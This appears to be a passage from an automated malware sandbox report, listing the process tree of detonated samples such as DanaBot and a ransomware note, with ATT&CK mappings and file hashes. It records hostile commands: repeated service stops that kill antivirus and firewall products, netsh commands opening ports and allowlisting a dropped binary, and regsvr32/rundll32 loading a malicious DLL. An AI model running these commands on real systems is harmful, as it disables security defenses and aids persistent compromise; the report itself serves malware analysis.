C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:3276
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:1020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:1264
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5328
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:3996
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:2272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:4412
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5740
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:1180
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:4400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:3968
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:4776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5080
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:2984
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:4048
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:3020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:4976
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:4792
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:4412
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:3980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
- System Location Discovery: System Language Discovery
PID:1244
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:4360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5888
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:2068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:3780
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:4300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:4188
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:2264
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:4132
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:6132
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:1256
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:3268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:1468
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:2744
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:4320
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:2896
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:1492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
- System Location Discovery: System Language Discovery
PID:3200
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:3980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5880
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:4188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:4716
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5328
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5980
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:1440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:1180
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4872
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:4064
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
- System Location Discovery: System Language Discovery
PID:4476 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:4696
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:6068
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5740
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:1420
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:1908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4840
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:4976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:1340
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:4688
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:3680
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:1980
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:4312
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:4308
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:3680
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:6168
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:6196
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4500
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:6180
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5636
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:6188
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:2504
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:6204
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:6220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:3652
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:3968
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:3276
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:6248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5876
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:6236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:3688
-
-
-
-
C:\Users\Admin\Downloads\Kobalc.exe"C:\Users\Admin\Downloads\Kobalc.exe"1⤵
- Looks for VMWare Tools registry key
- Executes dropped EXE
- Drops file in Windows directory
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
C:\Windows\Fonts\wmsncs.exe"C:\Windows\Fonts\wmsncs.exe"1⤵
- Modifies WinLogon for persistence
- Modifies firewall policy service
- Modifies security service
- Windows security bypass
- Boot or Logon Autostart Execution: Active Setup
- Looks for VMWare Tools registry key
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
PID:5148 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" firewall set portopening TCP 1013 BS2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2300
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" firewall set portopening TCP 8080 PORT12⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5348
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" firewall set portopening TCP 8081 PORT22⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2396
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" firewall add allowedprogram "C:\Windows\Fonts\wmsncs.exe" workstation ENABLE ALL2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5372
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" firewall set allowedprogram "C:\Windows\Fonts\wmsncs.exe" workstation ENABLE ALL2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4792
-
-
C:\Users\Admin\Downloads\DanaBot.exe"C:\Users\Admin\Downloads\DanaBot.exe"1⤵
- Executes dropped EXE
PID:712 -
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@7122⤵
- Loads dropped DLL
PID:5960 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f03⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:968
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 712 -s 1402⤵
- Program crash
PID:4292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 712 -ip 7121⤵PID:6076
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:6116
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Loveware.txt1⤵
- Opens file in notepad (likely ransom note)
PID:3904
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:2912
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:1832
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5864
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Drops desktop.ini file(s)
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3048 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd37d446f8,0x7ffd37d44708,0x7ffd37d447182⤵PID:4804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:22⤵PID:2652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:32⤵
- Downloads MZ/PE file
PID:1912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:82⤵PID:3060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:12⤵PID:5516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:12⤵PID:1972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:12⤵PID:4180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:12⤵PID:4300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5116 /prefetch:82⤵PID:2984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:12⤵PID:5872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:12⤵PID:936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:82⤵PID:5740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:82⤵PID:4260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:12⤵PID:3984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4148 /prefetch:82⤵PID:4388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:12⤵PID:3720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3732 /prefetch:82⤵PID:6068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:12⤵PID:3612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:12⤵PID:772
-
-
C:\Users\Admin\Downloads\IconDance.exe"C:\Users\Admin\Downloads\IconDance.exe"2⤵
- Executes dropped EXE
PID:1768
-
-
C:\Users\Admin\Downloads\IconDance.exe"C:\Users\Admin\Downloads\IconDance.exe"2⤵
- Executes dropped EXE
PID:4604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:12⤵PID:2256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,7710837787070709114,1541771991832100147,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:12⤵PID:5932
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4412
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1184
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:5796
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5056 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5572 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵PID:5568
-
-
-
C:\Users\Admin\Downloads\IconDance.exe"C:\Users\Admin\Downloads\IconDance.exe"1⤵
- Executes dropped EXE
PID:3468
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\9d6eb406bba14e55abf40834ee7efdae /t 3388 /p 33841⤵PID:4736
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Drops desktop.ini file(s)
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3776
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:3840
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3436
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"1⤵
- Suspicious use of SetThreadContext
PID:3276 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- Suspicious use of SetThreadContext
PID:3540 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵PID:3384
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵PID:2352
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:4312
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
3PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
5Active Setup
1Registry Run Keys / Startup Folder
2Winlogon Helper DLL
2Create or Modify System Process
5Windows Service
5Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Account Manipulation
1Boot or Logon Autostart Execution
5Active Setup
1Registry Run Keys / Startup Folder
2Winlogon Helper DLL
2Create or Modify System Process
5Windows Service
5Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
1Hide Artifacts
4Hidden Files and Directories
3Hidden Users
1Impair Defenses
8Disable or Modify System Firewall
2Disable or Modify Tools
4Safe Mode Boot
1Modify Registry
16Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Network Service Discovery
2Password Policy Discovery
1Peripheral Device Discovery
2Permission Groups Discovery
1Local Groups
1Query Registry
7System Information Discovery
8System Location Discovery
1System Language Discovery
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.0MB
MD581aab57e0ef37ddff02d0106ced6b91e
SHA16e3895b350ef1545902bd23e7162dfce4c64e029
SHA256a70f9e100dddb177f68ee7339b327a20cd9289fae09dcdce3dbcbc3e86756287
SHA512a651d0a526d31036a302f7ef1ee2273bb7c29b5206c9b17339baa149dd13958ca63db827d09b4e12202e44d79aac2e864522aca1228118ba3dcd259fe1fcf717
-
Filesize
4KB
MD58acd3515412f68cfac546272234f7441
SHA13070b177b358e7ecd750db171a93f5e8d0b66ae8
SHA256897d0ad8dcb4983185d43b9c1135d275678f1456e9784233ef65d106d656ea37
SHA5125eb15d8ef16482aa4c31175f7dd4b4d2bb613c5d9aaec8940178f94c176871fe61dd93ae5633b98be429c30f6e31506f09c44349a199c1fd8da9a5a557ce5a6e
-
Filesize
3.6MB
MD5c5ec8996fc800325262f5d066f5d61c9
SHA195f8e486960d1ddbec88be92ef71cb03a3643291
SHA256892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db
SHA5124721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a
-
Filesize
35KB
MD52f6a1bffbff81e7c69d8aa7392175a72
SHA194ac919d2a20aa16156b66ed1c266941696077da
SHA256dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de
SHA512ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37
-
Filesize
961KB
MD503a781bb33a21a742be31deb053221f3
SHA13951c17d7cadfc4450c40b05adeeb9df8d4fb578
SHA256e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210
SHA512010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45
-
